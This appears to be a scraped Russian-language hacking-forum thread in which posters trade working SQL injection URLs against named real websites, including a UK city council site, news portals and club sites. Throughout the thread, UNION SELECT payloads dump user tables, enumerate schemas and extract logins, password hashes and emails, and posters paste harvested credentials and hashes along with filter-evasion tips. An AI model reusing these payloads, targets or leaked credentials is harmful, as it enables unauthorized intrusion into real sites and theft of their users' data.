Любимый туристический портал о Чехии Code: http://www.ilovecz.ru/index.php?idofpage=-1+union+select+1,user(),version()/*
www.krasota.ru - здесь ошиваются такие люди как сергей зверев и прочие гандурасы \= таблиц не было времени подбирать \=
в данном случае не показатель. ошибка в запросе, находящемся в самом скрипте, а не определяемым строкой адреса.
Использовать char: nuke_users=char(110,117,107,101,95,117,115,101,114,115) В твоем случае - Code: http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+information_schema.columns+where+table_name=char(110,117,107,101,95,117,115,101,114,115)+limit+0,1/* Code: http://www.chasm.ru/profile.php?userid=1153%20union%20select%201,password,3,4,5,6,7,8,9,0,11,12,13,14,email,login,17,18,19,20,21,22%20from%20users/*
Code: http://dbusinessnews.com/shownews.php?newsid=-1+and+1+union+select+concat(email,0x3a,password),2,3,4,5,6,7+from+users+limit+1,1/*&type_news=latest Пассы в открытом виде. Лимитом можно погонять.
www.webchats.tv Code: http://www.webchats.tv/webchat.php?ID=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53+from+information_schema.tables+limit+20,1/*
sql-inj Кафедра КВН Сайт: http://www.kafedra.com.ua/ уязвимость: http://www.kafedra.com.ua/modules/dictionary/detail.php?id=885' таблица: xoops_users подобранные поля: uname,pass,email,uid 26 организмов 1:insight:af743111422bd5bb3e8bd5618b12bbae админка таблица: ibf_members подобранные поля: name,password,email,id 3121 организм На сайте поставили новый форум vBulletin, от него таблицы не нашел.
Lisburn City Council Занесло блин случайно на сайт правительства Code: http://www.lisburncity.gov.uk/your-city-council/council-minutes-and-reports/index.php?id=-4+union+select+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/*&sr=540'&month=&year=&search_keyword=&freshform=no root:03e6ff876dd3e5b1
Кстати прошу бережно отнестись к этому... т.к. первое - это сайт организации объединенных наций (una) а второй самый мзвестный в грузии телеканал... (типа нашего первого)
www.dfalink.com Code: http://www.dfalink.com/group.php?id=-775+union+select+1,password,zip,4,5,email,id,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,24,25,26,27+from+members/* лимит в помощь www.trikhin.ru Code: http://www.trikhin.ru/index.php?rn_id=-39+union+select+1,2,3,4,5,6,7+admin/* таблицa: user www.e30club.ru Code: http://www.e30club.ru/index.php?id=-13+union+select+1,2,3,4,5,6,7+from+ds_e30club_page/*
mr.The, Code: http://artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),password,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,14+from+users+limit+10/* 459 записей.
novdelo.ru Code: http://www.novdelo.ru/advertnews.php?id=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14+from+users/*
Произведено обновление Антибояна. Незабываем проверять иньекции на предмет боянности - http://hlamidnik.h18.ru/SQLS.html
\\скуль от меня\\ Code: http://www.autohalle24.de/include/include.php?id=-019+union+select+char(1),concat_ws(0x3a,user(),version(),database()),null,null,null/*
Выводит юзеров и пассы (в открытом виде). Так же мыла. Админа не нашёл, хотя особо не искал. Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users. Админка: http://www.sota1.ru/phoneadmin Форум: http://www.sota1.ru/phorum К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты.
Таблиц mysql.user & mysql.users просто - напросто не существует в этой базе данных phorum.user & phpbb.user таких тоже не существует. Code: http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password,char(58),user_icq),9+from+phpbb_users+limit+1,1/* MobileServ:d79096188b670c2f81b7001f73801117 _________________________ добавление от Hawkins MobileServ:d79096188b670c2f81b7001f73801117 - passw
sql-injections Xage.ru (молодежный портал) смотрим версию Code: http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,0,1,2,3,4/* а она пятая. (вывод в строке поиска). смотрим таблицы Code: http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+252,1/* так навскидку обращаем внимание на таблицы access, administrator, exp_members, user. аналогично смотрим поля в таблицах Code: http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,0,1,2,3,4+from+exp_members+limit+0,1/* в первых двух не нашел ничего интересного, в exp_members есть поля username,password,authcode,email Admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 таблица user относится к форуму vB , и поля там соответственные. 1:Admin:f1e82a7d9d6f8a25019349e1982d4f24:W%L:[email protected] --------------------------------------------------------------------- http://smru.com.ua/globalnews.php?type=n&num=-1579+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5/* ---------------------------------------------------------------------- Y.Dmitriy, примеры погляди и все на свои места сразу встанет. http://khomutynnik.info/view.php?type=list&p=1&status=0+and+1=0+union+select+1,2,3,concat_ws(0x3a,user(),version(),database())/*
